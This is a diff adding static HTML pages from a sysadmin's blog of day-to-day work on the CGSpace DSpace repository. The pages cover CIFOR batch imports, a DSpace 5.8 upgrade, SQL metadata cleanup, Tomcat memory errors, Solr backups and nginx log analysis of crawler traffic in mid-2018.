+<li>Ah, I think I just need to run <code>dspace oai import</code></li>
+</ul>
+<h2 id="2018-06-27">2018-06-27</h2>
+<ul>
+<li>Vika from CIFOR sent back his annotations on the duplicates for the &ldquo;CIFOR_May_9&rdquo; archive import that I sent him last week</li>
+<li>I&rsquo;ll have to figure out how to separate those we&rsquo;re keeping, deleting, and mapping into CIFOR&rsquo;s archive collection</li>
+<li>First, get the 62 deletes from Vika&rsquo;s file and remove them from the collection:</li>
+</ul>
+<pre tabindex="0"><code>$ grep delete 2018-06-22-cifor-duplicates.txt | grep -o -E &#39;[0-9]{5}\/[0-9]{5}&#39; &gt; cifor-handle-to-delete.txt
+$ wc -l cifor-handle-to-delete.txt
+62 cifor-handle-to-delete.txt
+$ wc -l 10568-92904.csv
+2461 10568-92904.csv
+$ while read line; do sed -i &#34;\#$line#d&#34; 10568-92904.csv; done &lt; cifor-handle-to-delete.txt
+$ wc -l 10568-92904.csv
+2399 10568-92904.csv
+</code></pre><ul>
+<li>This iterates over the handles for deletion and uses <code>sed</code> with an alternative pattern delimiter of &lsquo;#&rsquo; (which must be escaped), because the pattern itself contains a &lsquo;/&rsquo;</li>
+<li>The mapped ones will be difficult because we need their internal IDs in order to map them, and there are 50 of them:</li>
+</ul>
+<pre tabindex="0"><code>$ grep map 2018-06-22-cifor-duplicates.txt | grep -o -E &#39;[0-9]{5}\/[0-9]{5}&#39; &gt; cifor-handle-to-map.txt
+$ wc -l cifor-handle-to-map.txt
+50 cifor-handle-to-map.txt
+</code></pre><ul>
+<li>I can either get them from the databse, or programatically export the metadata using <code>dspace metadata-export -i 10568/xxxxx</code>&hellip;</li>
+<li>Oooh, I can export the items one by one, concatenate them together, remove the headers, and extract the <code>id</code> and <code>collection</code> columns using <a href="https://csvkit.readthedocs.io/">csvkit</a>:</li>
+</ul>
+<pre tabindex="0"><code>$ while read line; do filename=${line/\//-}.csv; dspace metadata-export -i $line -f $filename; done &lt; /tmp/cifor-handle-to-map.txt
+$ sed &#39;/^id/d&#39; 10568-*.csv | csvcut -c 1,2 &gt; map-to-cifor-archive.csv
+</code></pre><ul>
+<li>Then I can use Open Refine to add the &ldquo;CIFOR Archive&rdquo; collection to the mappings</li>
+<li>Importing the 2398 items via <code>dspace metadata-import</code> ends up with a Java garbage collection error, so I think I need to do it in batches of 1,000</li>
+<li>After deleting the 62 duplicates, mapping the 50 items from elsewhere in CGSpace, and uploading 2,398 unique items, there are a total of 2,448 items added in this batch</li>
+<li>I&rsquo;ll let Abenet take one last look and then move them to CGSpace</li>
+</ul>
+<h2 id="2018-06-28">2018-06-28</h2>
+<ul>
+<li>DSpace Test appears to have crashed last night</li>
+<li>There is nothing in the Tomcat or DSpace logs, but I see the following in <code>dmesg -T</code>:</li>
+</ul>
+<pre tabindex="0"><code>[Thu Jun 28 00:00:30 2018] Out of memory: Kill process 14501 (java) score 701 or sacrifice child
+[Thu Jun 28 00:00:30 2018] Killed process 14501 (java) total-vm:14926704kB, anon-rss:5693608kB, file-rss:0kB, shmem-rss:0kB
+[Thu Jun 28 00:00:30 2018] oom_reaper: reaped process 14501 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+</code></pre><ul>
+<li>Look over IITA&rsquo;s <a href="https://dspacetest.cgiar.org/handle/10568/96071">IITA_Jan_9_II_Ab</a> collection from earlier this month on DSpace Test</li>
+<li>Bosede fixed a few things (and seems to have removed many French IITA subjects like <code>AMÉLIORATION DES PLANTES</code> and <code>SANTÉ DES PLANTES</code>)</li>
+<li>I still see at least one issue with author affiliations, and I didn&rsquo;t bother to check the AGROVOC subjects because it&rsquo;s such a mess aanyways</li>
+<li>I suggested that IITA provide an updated list of subject to us so we can include their controlled vocabulary in CGSpace, which would also make it easier to do automated validation</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2018-07/index.html b/docs/2018-07/index.html
new file mode 100644
index 000000000..27d590373
--- /dev/null
+++ b/docs/2018-07/index.html
@@ -0,0 +1,623 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="July, 2018" />
+<meta property="og:description" content="2018-07-01
+
+I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:
+
+$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace
+
+During the mvn package stage on the 5.8 branch I kept getting issues with java running out of memory:
+
+There is insufficient memory for the Java Runtime Environment to continue.
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2018-07/" />
+<meta property="article:published_time" content="2018-07-01T12:56:54+03:00" />
+<meta property="article:modified_time" content="2019-10-28T13:39:25+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="July, 2018"/>
+<meta name="twitter:description" content="2018-07-01
+
+I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:
+
+$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace
+
+During the mvn package stage on the 5.8 branch I kept getting issues with java running out of memory:
+
+There is insufficient memory for the Java Runtime Environment to continue.
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "July, 2018",
+  "url": "https://alanorth.github.io/cgspace-notes/2018-07/",
+  "wordCount": "3376",
+  "datePublished": "2018-07-01T12:56:54+03:00",
+  "dateModified": "2019-10-28T13:39:25+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2018-07/">
+
+    <title>July, 2018 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-07/">July, 2018</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2018-07-01T12:56:54+03:00">Sun Jul 01, 2018</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-07-01">2018-07-01</h2>
+<ul>
+<li>I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:</li>
+</ul>
+<pre tabindex="0"><code>$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace
+</code></pre><ul>
+<li>During the <code>mvn package</code> stage on the 5.8 branch I kept getting issues with java running out of memory:</li>
+</ul>
+<pre tabindex="0"><code>There is insufficient memory for the Java Runtime Environment to continue.
+</code></pre><ul>
+<li>As the machine only has 8GB of RAM, I reduced the Tomcat memory heap from 5120m to 4096m so I could try to allocate more to the build process:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
+$ mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -Denv=dspacetest.cgiar.org -P \!dspace-lni,\!dspace-rdf,\!dspace-sword,\!dspace-swordv2 clean package
+</code></pre><ul>
+<li>Then I stopped the Tomcat 7 service, ran the ant update, and manually ran the old and ignored SQL migrations:</li>
+</ul>
+<pre tabindex="0"><code>$ sudo su - postgres
+$ psql dspace
+...
+dspace=# begin;
+BEGIN
+dspace=# \i Atmire-DSpace-5.8-Schema-Migration.sql
+DELETE 0
+UPDATE 1
+DELETE 1
+dspace=# commit
+dspace=# \q
+$ exit
+$ dspace database migrate ignored
+</code></pre><ul>
+<li>After that I started Tomcat 7 and DSpace seems to be working, now I need to tell our colleagues to try stuff and report issues they have</li>
+</ul>
+<h2 id="2018-07-02">2018-07-02</h2>
+<ul>
+<li>Discuss AgriKnowledge including our Handle identifier on their harvested items from CGSpace</li>
+<li>They seem to be only interested in Gates-funded outputs, for example: <a href="https://www.agriknowledge.org/files/tm70mv21t">https://www.agriknowledge.org/files/tm70mv21t</a></li>
+</ul>
+<h2 id="2018-07-03">2018-07-03</h2>
+<ul>
+<li>Finally finish with the CIFOR Archive records (a total of 2448):
+<ul>
+<li>I mapped the 50 items that were duplicates from elsewhere in CGSpace into <a href="https://cgspace.cgiar.org/handle/10568/16702">CIFOR Archive</a></li>
+<li>I did one last check of the remaining 2398 items and found eight who have a <code>cg.identifier.doi</code> that links to some URL other than a DOI so I moved those to <code>cg.identifier.url</code> and <code>cg.identifier.googleurl</code> as appropriate</li>
+<li>Also, thirteen items had a DOI in their citation, but did not have a <code>cg.identifier.doi</code> field, so I added those</li>
+<li>Then I imported those 2398 items in two batches (to deal with memory issues):</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
+$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/2018-06-27-New-CIFOR-Archive.csv
+$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/2018-06-27-New-CIFOR-Archive2.csv
+</code></pre><ul>
+<li>I noticed there are many items that use HTTP instead of HTTPS for their Google Books URL, and some missing HTTP entirely:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value like &#39;http://books.google.%&#39;;
+ count
+-------
+   785
+dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value ~ &#39;^books\.google\..*&#39;;
+ count
+-------
+     4
+</code></pre><ul>
+<li>I think I should fix that as well as some other garbage values like &ldquo;test&rdquo; and &ldquo;dspace.ilri.org&rdquo; etc:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# begin;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://books.google&#39;, &#39;https://books.google&#39;) where resource_type_id=2 and metadata_field_id=222 and text_value like &#39;http://books.google.%&#39;;
+UPDATE 785
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;books.google&#39;, &#39;https://books.google&#39;) where resource_type_id=2 and metadata_field_id=222 and text_value ~ &#39;^books\.google\..*&#39;;
+UPDATE 4
+dspace=# update metadatavalue set text_value=&#39;https://books.google.com/books?id=meF1CLdPSF4C&#39; where resource_type_id=2 and metadata_field_id=222 and text_value=&#39;meF1CLdPSF4C&#39;;
+UPDATE 1
+dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=222 and metadata_value_id in (2299312, 10684, 10700, 996403);
+DELETE 4
+dspace=# commit;
+</code></pre><ul>
+<li>Testing DSpace 5.8 with PostgreSQL 9.6 and Tomcat 8.5.32 (instead of my usual 7.0.88) and for some reason I get autowire errors on Catalina startup with 8.5.32:</li>
+</ul>
+<pre tabindex="0"><code>03-Jul-2018 19:51:37.272 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
+ java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;conversionService&#39; defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a&#39; of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property &#39;converters&#39; with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
+	at org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener.contextInitialized(DSpaceKernelServletContextListener.java:92)
+	at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4792)
+	at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5256)
+	at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:150)
+	at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:754)
+	at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:730)
+	at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:734)
+	at org.apache.catalina.startup.HostConfig.deployDescriptor(HostConfig.java:629)
+	at org.apache.catalina.startup.HostConfig$DeployDescriptor.run(HostConfig.java:1839)
+	at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
+	at java.util.concurrent.FutureTask.run(FutureTask.java:266)
+	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+	at java.lang.Thread.run(Thread.java:748)
+Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;conversionService&#39; defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a&#39; of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property &#39;converters&#39; with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
+</code></pre><ul>
+<li>Gotta check that out later&hellip;</li>
+</ul>
+<h2 id="2018-07-04">2018-07-04</h2>
+<ul>
+<li>I verified that the autowire error indeed only occurs on Tomcat 8.5, but the application works fine on Tomcat 7</li>
+<li>I have raised this in the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">DSpace 5.8 compatibility ticket on Atmire&rsquo;s tracker</a></li>
+<li>Abenet wants me to add &ldquo;United Kingdom government&rdquo; to the sponsors on CGSpace so I created a ticket to track it (<a href="https://github.com/ilri/DSpace/issues/381">#381</a>)</li>
+<li>Also, Udana wants me to add &ldquo;Enhancing Sustainability Across Agricultural Systems&rdquo; to the WLE Phase II research themes so I created a ticket to track that (<a href="https://github.com/ilri/DSpace/issues/382">#382</a>)</li>
+<li>I need to try to finish this DSpace 5.8 business first because I have too many branches with cherry-picks going on right now!</li>
+</ul>
+<h2 id="2018-07-06">2018-07-06</h2>
+<ul>
+<li>CCAFS want me to add &ldquo;PII-FP2_MSCCCAFS&rdquo; to their Phase II project tags on CGSpace (<a href="https://github.com/ilri/DSpace/issues/383">#383</a>)</li>
+<li>I&rsquo;ll do it in a batch with all the other metadata updates next week</li>
+</ul>
+<h2 id="2018-07-08">2018-07-08</h2>
+<ul>
+<li>I was tempted to do the Linode instance upgrade on CGSpace (linode18), but after looking closely at the system backups I noticed that Solr isn&rsquo;t being backed up to S3</li>
+<li>I apparently noticed this—and fixed it!—in <a href="/cgspace-notes/2016-07/">2016-07</a>, but it doesn&rsquo;t look like the backup has been updated since then!</li>
+<li>It looks like I added Solr to the <code>backup_to_s3.sh</code> script, but that script is not even being used (<code>s3cmd</code> is run directly from root&rsquo;s crontab)</li>
+<li>For now I have just initiated a manual S3 backup of the Solr data:</li>
+</ul>
+<pre tabindex="0"><code># s3cmd sync --delete-removed /home/backup/solr/ s3://cgspace.cgiar.org/solr/
+</code></pre><ul>
+<li>But I need to add this to cron!</li>
+<li>I wonder if I should convert some of the cron jobs to systemd services / timers&hellip;</li>
+<li>I sent a note to all our users on Yammer to ask them about possible maintenance on Sunday, July 14th</li>
+<li>Abenet wants to be able to search by journal title (dc.source) in the advanced Discovery search so I opened an issue for it (<a href="https://github.com/ilri/DSpace/issues/384">#384</a>)</li>
+<li>I regenerated the list of names for all our ORCID iDs using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; /tmp/2018-07-08-orcids.txt
+$ ./resolve-orcids.py -i /tmp/2018-07-08-orcids.txt -o /tmp/2018-07-08-names.txt -d
+</code></pre><ul>
+<li>But after comparing to the existing list of names I didn&rsquo;t see much change, so I just ignored it</li>
+</ul>
+<h2 id="2018-07-09">2018-07-09</h2>
+<ul>
+<li>Uptime Robot said that CGSpace was down for two minutes early this morning but I don&rsquo;t see anything in Tomcat logs or dmesg</li>
+<li>Uptime Robot said that CGSpace was down for two minutes again later in the day, and this time I saw a memory error in Tomcat&rsquo;s <code>catalina.out</code>:</li>
+</ul>
+<pre tabindex="0"><code>Exception in thread &#34;http-bio-127.0.0.1-8081-exec-557&#34; java.lang.OutOfMemoryError: Java heap space
+</code></pre><ul>
+<li>I&rsquo;m not sure if it&rsquo;s the same error, but I see this in DSpace&rsquo;s <code>solr.log</code>:</li>
+</ul>
+<pre tabindex="0"><code>2018-07-09 06:25:09,913 ERROR org.apache.solr.servlet.SolrDispatchFilter @ null:java.lang.RuntimeException: java.lang.OutOfMemoryError: Java heap space
+</code></pre><ul>
+<li>I see a strange error around that time in <code>dspace.log.2018-07-08</code>:</li>
+</ul>
+<pre tabindex="0"><code>2018-07-09 06:23:43,510 ERROR com.atmire.statistics.SolrLogThread @ IOException occured when talking to server at: http://localhost:8081/solr/statistics
+org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr/statistics
+</code></pre><ul>
+<li>But not sure what caused that&hellip;</li>
+<li>I got a message from Linode tonight that CPU usage was high on CGSpace for the past few hours around 8PM GMT</li>
+<li>Looking in the nginx logs I see the top ten IP addresses active today:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;09/Jul/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+   1691 40.77.167.84
+   1701 40.77.167.69
+   1718 50.116.102.77
+   1872 137.108.70.6
+   2172 157.55.39.234
+   2190 207.46.13.47
+   2848 178.154.200.38
+   4367 35.227.26.162
+   4387 70.32.83.92
+   4738 95.108.181.88
+</code></pre><ul>
+<li>Of those, <em>all</em> except <code>70.32.83.92</code> and <code>50.116.102.77</code> are <em>NOT</em> re-using their Tomcat sessions, for example from the XMLUI logs:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88&#39; dspace.log.2018-07-09
+4435
+</code></pre><ul>
+<li><code>95.108.181.88</code> appears to be Yandex, so I dunno why it&rsquo;s creating so many sessions, as its user agent should match Tomcat&rsquo;s Crawler Session Manager Valve</li>
+<li><code>70.32.83.92</code> is on MediaTemple but I&rsquo;m not sure who it is. They are mostly hitting REST so I guess that&rsquo;s fine</li>
+<li><code>35.227.26.162</code> doesn&rsquo;t declare a user agent and is on Google Cloud, so I should probably mark them as a bot in nginx</li>
+<li><code>178.154.200.38</code> is Yandex again</li>
+<li><code>207.46.13.47</code> is Bing</li>
+<li><code>157.55.39.234</code> is Bing</li>
+<li><code>137.108.70.6</code> is our old friend CORE bot</li>
+<li><code>50.116.102.77</code> doesn&rsquo;t declare a user agent and lives on HostGator, but mostly just hits the REST API so I guess that&rsquo;s fine</li>
+<li><code>40.77.167.84</code> is Bing again</li>
+<li>Interestingly, the first time that I see <code>35.227.26.162</code> was on 2018-06-08</li>
+<li>I&rsquo;ve added <code>35.227.26.162</code> to the bot tagging logic in the nginx vhost</li>
+</ul>
+<h2 id="2018-07-10">2018-07-10</h2>
+<ul>
+<li>Add &ldquo;United Kingdom government&rdquo; to sponsors (<a href="https://github.com/ilri/DSpace/issues/381">#381</a>)</li>
+<li>Add &ldquo;Enhancing Sustainability Across Agricultural Systems&rdquo; to WLE Phase II Research Themes (<a href="https://github.com/ilri/DSpace/issues/382">#382</a>)</li>
+<li>Add &ldquo;PII-FP2_MSCCCAFS&rdquo; to CCAFS Phase II Project Tags (<a href="https://github.com/ilri/DSpace/issues/383">#383</a>)</li>
+<li>Add journal title (dc.source) to Discovery search filters (<a href="https://github.com/ilri/DSpace/issues/384">#384</a>)</li>
+<li>All were tested and merged to the <code>5_x-prod</code> branch and will be deployed on CGSpace this coming weekend when I do the Linode server upgrade</li>
+<li>I need to get them onto the 5.8 testing branch too, either via cherry-picking or by rebasing after we finish testing Atmire&rsquo;s 5.8 pull request (<a href="https://github.com/ilri/DSpace/pull/378">#378</a>)</li>
+<li>Linode sent an alert about CPU usage on CGSpace again, about 13:00UTC</li>
+<li>These are the top ten users in the last two hours:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;10/Jul/2018:(11|12|13)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     81 193.95.22.113
+     82 50.116.102.77
+    112 40.77.167.90
+    117 196.190.95.98
+    120 178.154.200.38
+    215 40.77.167.96
+    243 41.204.190.40
+    415 95.108.181.88
+    695 35.227.26.162
+    697 213.139.52.250
+</code></pre><ul>
+<li>Looks like <code>213.139.52.250</code> is Moayad testing his new CGSpace vizualization thing:</li>
+</ul>
+<pre tabindex="0"><code>213.139.52.250 - - [10/Jul/2018:13:39:41 +0000] &#34;GET /bitstream/handle/10568/75668/dryad.png HTTP/2.0&#34; 200 53750 &#34;http://localhost:4200/&#34; &#34;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36&#34;
+</code></pre><ul>
+<li>He said there was a bug that caused his app to request a bunch of invalid URLs</li>
+<li>I&rsquo;ll have to keep and eye on this and see how their platform evolves</li>
+</ul>
+<h2 id="2018-07-11">2018-07-11</h2>
+<ul>
+<li>Skype meeting with Peter and Addis CGSpace team
+<ul>
+<li>We need to look at doing the <code>dc.rights</code> stuff again, which we last worked on in 2018-01 and 2018-02</li>
+<li>Abenet suggested that we do a controlled vocabulary for the authors, perhaps with the top 1,500 or so on CGSpace?</li>
+<li>Peter told Sisay to test this controlled vocabulary</li>
+<li>Discuss meeting in Nairobi in October</li>
+</ul>
+</li>
+</ul>
+<h2 id="2018-07-12">2018-07-12</h2>
+<ul>
+<li>Uptime Robot said that CGSpace went down a few times last night, around 10:45 PM and 12:30 AM</li>
+<li>Here are the top ten IPs from last night and this morning:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;11/Jul/2018:22&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     48 66.249.64.91
+     50 35.227.26.162
+     57 157.55.39.234
+     59 157.55.39.71
+     62 147.99.27.190
+     82 95.108.181.88
+     92 40.77.167.90
+     97 183.128.40.185
+     97 240e:f0:44:fa53:745a:8afe:d221:1232
+   3634 208.110.72.10
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;12/Jul/2018:00&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     25 216.244.66.198
+     38 40.77.167.185
+     46 66.249.64.93
+     56 157.55.39.71
+     60 35.227.26.162
+     65 157.55.39.234
+     83 95.108.181.88
+     87 66.249.64.91
+     96 40.77.167.90
+   7075 208.110.72.10
+</code></pre><ul>
+<li>We have never seen <code>208.110.72.10</code> before&hellip; so that&rsquo;s interesting!</li>
+<li>The user agent for these requests is: Pcore-HTTP/v0.44.0</li>
+<li>A brief Google search doesn&rsquo;t turn up any information about what this bot is, but lots of users complaining about it</li>
+<li>This bot does make a lot of requests all through the day, although it seems to re-use its Tomcat session:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;Pcore-HTTP&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+  17098 208.110.72.10
+# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10&#39; dspace.log.2018-07-11
+1161
+# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10&#39; dspace.log.2018-07-12
+1885
+</code></pre><ul>
+<li>I think the problem is that, despite the bot requesting <code>robots.txt</code>, it almost exlusively requests dynamic pages from <code>/discover</code>:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;Pcore-HTTP&#34; | grep -o -E &#34;GET /(browse|discover|search-filter)&#34; | sort -n | uniq -c | sort -rn
+  13364 GET /discover
+    993 GET /search-filter
+    804 GET /browse
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;Pcore-HTTP&#34; | grep robots
+208.110.72.10 - - [12/Jul/2018:00:22:28 +0000] &#34;GET /robots.txt HTTP/1.1&#34; 200 1301 &#34;https://cgspace.cgiar.org/robots.txt&#34; &#34;Pcore-HTTP/v0.44.0&#34;
+</code></pre><ul>
+<li>So this bot is just like Baiduspider, and I need to add it to the nginx rate limiting</li>
+<li>I&rsquo;ll also add it to Tomcat&rsquo;s Crawler Session Manager Valve to force the re-use of a common Tomcat sesssion for all crawlers just in case</li>
+<li>Generate a list of all affiliations in CGSpace to send to Mohamed Salem to compare with the list on MEL (sorting the list by most occurrences):</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where resource_type_id=2 and metadata_field_id=211 group by text_value order by count desc) to /tmp/affiliations.csv with csv header
+COPY 4518
